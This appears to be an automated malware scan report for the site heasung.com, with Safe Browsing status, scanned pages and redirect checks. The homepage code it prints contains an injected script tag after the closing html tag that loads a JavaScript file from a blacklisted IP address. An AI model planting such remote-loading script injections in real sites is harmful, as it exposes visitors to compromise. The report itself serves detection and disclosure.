Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=heasung.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://heasung.com/ | 200 OK Content-Length: 488 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 121.67.183.105 <html>
<head> <title>"Çý¼ºÅ×Å©¿¡ ¿À½Å °ÍÀ» ȯ¿µÇÕ´Ï´Ù."</title> </head> <frameset rows="0%,100%" cols="*" border="0" framespacing="0"> <frame src="no.asp" scrolling="NO" frameborder="NO" name="no"> <frame src="main.asp" frameborder="NO" name="main" marginwidth="0" marginheight="0" scrolling="auto"> </frameset> <noframes><body bgcolor="#FFFFFF"> </body></noframes> </html> <script type="text/javascript" src="http://121.67.183.105:83/MEDIA/holder.js"></script> | ||
http://121.67.183.105:83/MEDIA/holder.js | 404 Not Found Content-Length: 314 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 121.67.183.105 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /MEDIA/holder.js was not found on this server.</p> <hr> <address>Apache Server at <a href="mailto:admin@localhost">121.67.183.105</a> Port 83</address> </body></html> | ||
http://121.67.183.105:83/test404page.js | 404 Not Found Content-Length: 313 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 121.67.183.105 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /test404page.js was not found on this server.</p> <hr> <address>Apache Server at <a href="mailto:admin@localhost">121.67.183.105</a> Port 83</address> </body></html> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: heasung.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 27 Dec 2014 05:07:50 GMT
Server: Microsoft-IIS/6.0
Content-Length: 488
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCBQTCTQ=EALJALBDCMIBDLFLBOGDDBHG; path=/
X-Powered-By: ASP.NET
...488 bytes of data.
GET / HTTP/1.1
Host: heasung.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 27 Dec 2014 05:07:50 GMT
Server: Microsoft-IIS/6.0
Content-Length: 488
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCBQTCTQ=EALJALBDCMIBDLFLBOGDDBHG; path=/
X-Powered-By: ASP.NET
...488 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: heasung.com
Referer: http://www.google.com/search?q=heasung.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: heasung.com
Referer: http://www.google.com/search?q=heasung.com
Result:
The result is similar to the first query. There are no suspicious redirects found.